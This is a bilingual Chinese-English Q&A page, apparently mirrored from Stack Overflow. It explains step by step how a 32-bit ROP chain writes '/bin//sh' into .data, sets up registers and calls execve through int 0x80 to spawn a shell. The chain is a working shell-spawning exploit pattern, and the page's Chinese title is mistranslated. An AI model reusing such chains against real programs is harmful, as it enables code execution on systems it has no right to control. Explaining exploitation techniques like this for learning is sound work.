通过面向收益的编程自动开发 [英] Automatic exploitation via return oriented programming
问题描述
我需要帮助来了解此图像中发生的情况:.
I need help understanding what is going on in this image: .
我看不到是@ .data
指令与mov dword ptr [edx], eax
结合完成的工作,特别是考虑到edx紧随其后弹出.
What I fail to see is what the @ .data
instructions accomplish in combination with the mov dword ptr [edx], eax
, especially considered that edx is popped right after.
推荐答案
简而言之,@ .data
行是指用于写入"/bin//sh"
字符串的可写内存,该字符串随后将被执行. .data
部分只是可执行文件的可读/可写部分,该可执行文件已加载到内存中,通常用于存储全局变量.
In short, the @ .data
lines refer to writable memory that is used to write the "/bin//sh"
string, which is later executed. The .data
section is just a readable/writable section of the executable that is loaded into memory, typically used to store global variables.
以下是ROP链工作方式的细分:
Here's a breakdown of how the ROP chain works:
pop edx ; ret
@ .data
这两个小工具将.data
部分的地址弹出到edx
.
These two gadgets pop the address of the .data
section into edx
.
pop eax ; ret
'/bin'
这些小工具弹出0x6e69622f
或/bin//sh
字符串的前四个字符进入eax
These gadgets pop 0x6e69622f
, or the first four characters of the /bin//sh
string into eax
mov dword ptr [edx], eax ; ret
然后将eax
的内容写入地址edx
;此时,字符串的前四个字符已写在.data
部分的开头
Then this writes the contents of eax
at the address edx
; at this point the first four characters of the string have been written at the beginning of the .data
section
pop edx ; ret
@ .data + 4
pop eax ; ret
'//sh'
mov dword ptr [edx], eax ; ret
这部分做完全相同的事情来写入字符串的后四个字节
This part does the exact same thing to write the next four bytes of the string
pop edx ; ret
@ .data + 8
xor eax, eax ; ret
mov dword ptr [edx], eax ; ret
然后在字符串后写入四个空字节以将其空终止
And then this writes four null bytes after the string to null-terminate it
pop ebx ; ret
@ .data
这将获取ebx
pop ecx ; pop ebx ; ret
@ .data + 8
padding without overwrite ebx
这会将.data+8
写入ecx
,并将.data
写入ebx
. (请注意,这里的第三行是0x080f4060
,我们可以看到与上面三行中的.data
相同的地址)
This writes .data+8
to ecx
and writes .data
to ebx
. (Notice that the third line here is 0x080f4060
, which we can see is the same address of .data
three lines above)
pop edx ; ret
@ .data + 8
这会将.data+8
写入edx
xor eax, eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
这会将11
写入eax
int 0x80
这将在Linux上执行系统调用. 此处是了解系统调用的重要资源.我们看到,当eax
为11(0xb
)时,它是对execve
的调用,其定义如下:
This executes a system call on Linux. Here is a great resource for understanding system calls. We see that when eax
is 11 (0xb
), it is a call to execve
, which is defined as follows:
int execve(const char *filename, char *const argv[], char *const envp[]);
因此,ebx
是filename
,ecx
是argv
,而edx
是envp
.此时,ebx
指向字符串/bin//sh
,而ecx
和edx
均为.data+8
.它们都被视为字符串,但是由于.data+8
包含空字节,因此ecx
和edx
是空字符串.因此呼叫实质上是execve("/bin//sh", "", "");
So then ebx
is filename
, ecx
is argv
, and edx
is envp
. At this point, ebx
points to the string /bin//sh
, and both ecx
and edx
are .data+8
. They are both treated as strings, but since .data+8
contains the null byte, ecx
and edx
are the empty string. So the call is essentially execve("/bin//sh", "", "");
这篇关于通过面向收益的编程自动开发的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!